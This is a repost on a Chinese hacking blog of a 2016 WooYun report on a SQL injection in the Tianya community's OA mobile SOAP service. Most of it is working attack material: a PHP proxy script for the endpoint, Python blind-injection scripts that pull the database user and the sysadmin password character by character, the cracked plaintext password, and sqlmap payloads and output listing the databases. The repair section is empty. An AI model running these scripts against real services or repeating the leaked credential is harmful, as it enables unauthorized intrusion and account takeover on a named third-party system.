记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

天涯社区某分在存在SQL注入漏洞(附脚本)

2016-05-18 05:50

问题出在http://oa.tianya.cn/services/MobileService?wsdl



checkUserLogin



code 区域
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.services.weaver.com.cn" xmlns:urn2="http://workflow.webservices.mobile.weaver">

<SOAP-ENV:Header/>

<SOAP-ENV:Body>

<urn:checkUserLogin>

<urn:in0>1</urn:in0>

<urn:in1>1</urn:in1>

<urn:in2>1</urn:in2>

</urn:checkUserLogin>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>







in0参数



正确返回5 错误返回4



使用如下脚本



code 区域
<?php

$in0=$_GET['name'];

header("content-type:text/html;charset=utf-8");

try {

$client = new SoapClient('http://oa.tianya.cn/services/MobileService?wsdl');

$xml = "

<SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:soap='http://schemas.xmlsoap.org/wsdl/soap/' xmlns:xsd='http://www.w3.org/1999/XMLSchema' xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' xmlns:m0='http://tempuri.org/' xmlns:SOAP-ENC='http://schemas.xmlsoap.org/soap/encoding/' xmlns:urn='webservices.services.weaver.com.cn' xmlns:urn2='http://workflow.webservices.mobile.weaver'>

<SOAP-ENV:Header/>

<SOAP-ENV:Body>

<urn:checkUserLogin>

<urn:in0>1</urn:in0>

<urn:in1>1</urn:in1>

<urn:in2>1</urn:in2>

</urn:checkUserLogin>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

";

$result=$client->checkUserLogin(array('in0'=>$in0,'in1'=>'123456','in2'=>1));

echo $result->out ;//显示结果

} catch (SOAPFault $e) {

print_r('Exception:'.$e);

}

?>





然后访问http://*.*.*.*/xx.php?name=sysadmin

根据返回结果来判断是否正确

python脚本如下:

获取用户

code 区域
#encoding=utf-8

import httplib

import string

import sys

import random

import urllib

headers = {'Content-Type':'application/x-www-form-urlencoded',

'Content-Type': 'text/html;charset=UTF-8',

'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0',

}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'



print 'Start to retrive user:'

user= ''

for i in range(1, 8):

for payload in payloads:



conn = httplib.HTTPConnection('127.0.0.1', timeout=150)



conn.request(method='GET',

url="/ty.php?name=1'or/**/ascii(substring(user,%s,1))=%s/**/and'a'='a"% (i, ord(payload)),



headers=headers)



resp = conn.getresponse()

html_doc = resp.read()

conn.close()



print '.',



if html_doc.count('5') > 0:



user += payload



print '\n\n[in progress]', user,



break



print '\n\n[Done] user is %s' % user





Snap98.png





漏洞证明:

获取sysadmin密码



主要代码

code 区域
payloads = '0123456789ABCDEF'



print 'Start to retrive password:'

password= ''

for i in range(32):

for j in payloads:



conn = httplib.HTTPConnection('127.0.0.1', timeout=150)



conn.request(method='GET',

url="/ty.php?name=sysadmin'/**/and/**/substring((select(password)/**/from/**/hrmresourcemanager/**/where/**/loginid='sysadmin'),"+str(i+1)+",1)='"+j+"'/**/and'1'='1",



headers=headers)



resp = conn.getresponse()

html_doc = resp.read()

#print html_doc

conn.close()



print '.',



if html_doc.count('5') > 0:



password += j



print '\n\n[in progress]', password,



break





Snap97.png



密码解密后为Tianya089*

Snap99.png







sqlmap跑的结果



code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: name (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: name=sysadmin' AND 2387=2387 AND 'tJYN'='tJYN



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)

Payload: name=sysadmin' AND 8324=(SELECT COUNT(*) FROM sysusers AS sys1,sysu

sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6

,sysusers AS sys7) AND 'YqQh'='YqQh

---



code 区域
available databases [8]:

[*] ecology

[*] ecology_test

[*] lumigens

[*] master

[*] model

[*] msdb

[*] tempdb

[*] update_log





code 区域
select count(*) from HrmResource;:    '1557'



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0209613

阅读:85311 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“天涯社区某分在存在SQL注入漏洞(附脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云